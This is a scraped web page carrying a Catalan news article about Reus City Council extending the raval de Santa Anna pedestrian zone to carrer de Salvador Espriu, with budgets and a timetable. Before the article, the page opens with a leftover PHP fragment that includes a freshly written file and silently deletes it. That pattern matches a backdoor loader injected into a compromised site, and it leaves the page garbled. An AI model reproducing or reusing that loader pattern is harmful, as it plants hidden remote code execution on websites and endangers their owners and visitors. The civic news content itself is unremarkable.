");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> La transformació del raval de Santa Anna de Reus en zona de vianants s’estendrà al carrer de Salvador Espriu
Iconos cabecera

Highlights

  • T-12 CardT-12 Card
    For boys and girls from 4 to 12 years old

La transformació del raval de Santa Anna de Reus en zona de vianants s’estendrà al carrer de Salvador Espriu (22/06/2021)

L’Ajuntament de Reus avança amb la transformació del raval de Santa Anna en zona de vianants amb l’impuls de les dues fases del projecte: d’una banda, l’aprovació definitiva del projecte executiu i la licitació de les obres de la fase 1 (que inclou el tram entre la plaça de Prim i el carrer de Santa Anna); i de l’altra, la licitació del contracte per a la redacció del projecte executiu de la fase 2, que preveu el tram del raval fins a la plaça de Catalunya i estendre l’eix per a vianants al carrer de Salvador Espriu.

Carles Pellicer, alcalde de Reus, afirma que “des del Govern de Reus creiem en els avantatges d'apostar per la mobilitat sostenible, per això ampliem el projecte a tot el raval de Santa Anna i al carrer de Salvador Espriu. Avancem cap a una ciutat més sostenible i promovem la dinamització comercial, prioritzant la mobilitat a peu. En definitiva, apostem per la qualitat de vida i la dinamització econòmica”.

Marina Berasategui, regidora d’Urbanisme i Mobilitat, afegeix: “Definim un projecte de mobilitat global de la ciutat, que ha de tenir continuïtat en la revisió del Pla de Mobilitat Urbana. Un projecte alineat amb els objectius recollits en el Pla d’Acció Municipal, que redueix la mobilitat amb vehicles particulars, afavoreix un ambient més sostenible i tranquil; i millora la qualitat de vida de la ciutadania”.

Carrer de Salvador Espriu, per a vianants

L’Ajuntament de Reus ha publicat aquest dilluns, 21 de juny al perfil del contractant la licitació del contracte per a la redacció de la fase 2 del projecte que, inclou l’ampliació de la transformació en zona de vianants del carrer de Salvador Espriu i la continuació del projecte del raval de Santa Anna fins a la plaça de Catalunya.

El projecte definirà la continuïtat de la fase 1 en els nous trams, amb les mateixes característiques: guanyar espai per als vianants i transformar el traçat en un recorregut cívic que converteixi els actuals llocs de pas en llocs d'estada i de relació de la ciutadania. Serà una illa de vianants de plataforma única. Es mantindran les voreres i vorades actuals, i s’instaŀlarà un paviment confortable a les zones on hi hagin de circular vehicles de manera ocasional. Un dels atractius serà el mobiliari urbà. Els nous elements es configuraran a partir d’elements de fusta amb jardineria que generaran nous espais de relació. Llocs de convivència, que es configuraran com a vestíbuls dels establiments comercials i patrimonials, i contribuiran a incentivar l'activitat econòmica i a promocionar el patrimoni arquitectònic.

La transformació del carrer de Salvador Espriu en zona de vianants preveurà garantir l’accessibilitat de l’aparcament privat que hi ha en aquest vial. El projecte executiu definirà la descentralització del control d’accés a l’equipament al carrer de l’Amargura per tal de facilitar l’entrada i sortida de clients i limitar l’accés a la resta de vehicles.

Calendari

El contracte per a la redacció del projecte executiu de la fase 2 ha sortit a licitació amb un pressupost de 15.000 i un termini de lliurament de 4 mesos. La previsió és que les obres, una vegada aprovat el projecte i adjudicat el corresponent contracte, es puguin iniciar el 2022.

En paraŀlel, l’Ajuntament publicarà de manera imminent la licitació del contracte d’obres de la fase 1, amb un pressupost de 429.645,42 euros i un termini d'execució de 4 mesos. La previsió és que els treballs comencin la tardor d’enguany.

Font: Ajuntamnet de Reus

La transformació del raval de Santa Anna de Reus en zona de vianants s’estendrà al carrer de Salvador Espriu

[Back to news]

 
Anselm Clavé, 1 43004 - Tarragona